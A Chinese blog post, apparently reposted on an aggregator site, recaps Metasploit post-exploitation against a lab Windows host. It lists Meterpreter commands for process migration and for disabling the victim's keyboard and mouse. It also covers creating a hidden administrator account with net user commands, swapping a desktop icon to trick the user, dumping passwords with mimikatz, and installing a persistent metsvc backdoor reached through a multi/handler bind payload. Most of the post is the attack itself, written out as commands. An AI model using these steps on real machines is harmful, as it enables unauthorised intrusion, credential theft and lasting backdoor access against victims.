zoukankan      html  css  js  c++  java
  • 主机渗透复盘总结-后渗透

    总结流程:

         1-ip获取,互相通信
     2-进入接口-msf武器库
     3-挑选武器-exploit模块
     4-装填子弹paypload模块
     5-后渗透meterpreter模块
    

    进程迁移:

    1. 输入 ps 命令 (获取目标机正在运行的进程)

    2. 输入 getpid 命令(查看本机meterpreter shell的进程号)

    3. 将meterpreter进程迁移到受害机稳定的进程内,这里选择进程号为3524的进程

    4. uictl开关键盘/鼠标,顾明思意。disable关;enable开、keybord键盘、mouse鼠标

    5. 关闭它的鼠标,和键盘功能

    6. 受害机的鼠标点击功能失效,键盘输入失效

    7. 查看受害机当前处于的目录

    8. 进行文件上传

    9. 远程连接桌面,添加用户账号 net user apple hkb /add
      添加刚刚创建的用户到管理组 net localgroup administrators apple /add

    10. 远程登录 :rdesktop 192.168.73.129,将上传的文件图标改成桌面程序的图标,然后进行偷换。

    11. mimikatz抓取密码,load mimikatz加载

    12. 获取密码,wdigest

    信息收集:常用脚本

    run post/windows/gather/checkvm #是否虚拟机
    run post/linux/gather/checkvm #是否虚拟机
    run post/windows/gather/forensics/enum_drives #查看分区
    run post/windows/gather/enum_applications #获取安装软件信息
    run post/windows/gather/dumplinks #获取最近的文件操作
    run post/windows/gather/enum_ie #获取IE缓存
    run post/windows/gather/enum_chrome #获取Chrome缓存
    run post/windows/gather/enum_patches #补丁信息
    run post/windows/gather/enum_domain #查找域控

    总结:

    进程迁移的重要性,后渗透主要是metaploit工具的使用,思路目的较为重要。
    植入后门·;run metsvc –h # 查看帮助
    run metsvc –A #自动安装后门

    连接后门·;msf > use exploit/multi/handler
    msf > set payload windows/metsvc_bind_tcp
    msf > set RHOST 192.168.159.144
    msf > set LPORT 31337
    msf > exploit

    最后分享后渗透学习网址(后渗透之meterpreter使用攻略):https://xz.aliyun.com/t/2536

    作者:hkb
    本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。
  • 相关阅读:
    地铁图快速寻路算法
    手工下载器
    在Windows7下玩老游戏花屏的解决办法
    使用代码生成建立可扩展序列化器(上)
    用Java写成的Tiger到JVM编译器
    魔王的反击
    爬取排行榜123网站之2019年上海企业前20强
    微博热搜排行榜前十
    [翻译]Everything you know about CSS is wrong!
    YSlow 1/13 Minimize HTTP Requests
  • 原文地址:https://www.cnblogs.com/kbhome/p/12535026.html
Copyright © 2011-2022 走看看